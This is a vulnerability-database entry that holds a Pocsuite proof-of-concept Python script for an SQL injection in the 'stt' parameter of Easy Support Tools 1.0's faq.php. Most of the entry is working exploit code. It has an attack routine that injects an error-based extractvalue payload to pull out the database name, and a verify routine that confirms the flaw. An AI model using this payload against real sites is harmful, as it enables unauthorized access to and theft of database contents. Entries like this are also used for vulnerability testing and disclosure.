Easy Support Tools 1.0 - 'stt' Parameter SQL Injection

🗓️ 09 Feb 2017 00:00:00Reported by sebaoType

Easy Support Tools 1.0 'stt' parameter SQL Injection. Allows attackers to obtain sensitive database data


                                                #!/usr/bin/python
# -*- coding: utf-8 -*-

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re
import random
import hashlib



class TestPOC(POCBase):
    name = "Easy Support Tools 1.0 - 'stt' Parameter SQL Injection"
    vulID = ''
    author = ['sebao']
    vulType = 'sql injection'
    version = '1.0'    # default version: 1.0
    references = ['https://www.exploit-db.com/exploits/41268/']
    desc = '''Easy Support Tools 1.0 faq.php页面存在SQL注入漏洞。由于未能对stt变量进行过滤，攻击者可利用漏洞获取数据库敏感数据。'''

    vulDate = ''
    createDate = '2017-2-9'
    updateDate = '2017-2-9'

    appName = 'Easy Support Tools '
    appVersion = '1.0'
    appPowerLink = ''
    samples = []

    def _attack(self):
        result = {}
        vul_url="/faq.php?stt=1+Procedure+Analyse+(extractvalue(0,concat(0x27,0x496873616e2053656e63616e,0x3a,database())),0)-- -"
        url= self.url + vul_url
        resp = req.get(url)
        str = resp.content
        if resp.status_code == 200:
            results = re.search(r"Ihsan Sencan:(.*?)'", str)
            if results:
                dbname = results.group(1)

                result['Database'] = {}
                result['Database']['DBname'] = dbname

        return self.parse_output(result)



    def _verify(self):
        '''verify mode'''
        result = {}
        a = str(random.randint(100000, 900000))
        md5 = hashlib.md5()
        md5.update(a)
        md5hash = md5.hexdigest()

        vul_url = "/faq.php?stt=1+Procedure+Analyse+(extractvalue(0,concat(0x27,0x496873616e2053656e63616e,0x3a,md5(%s))),0)-- -" % a
        url = self.url + vul_url
        resp = req.get(url)

        if resp.status_code == 200 and md5hash[2:17] in resp.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)

09 Feb 2017 00:00Current

7.1High risk

Vulners AI Score7.1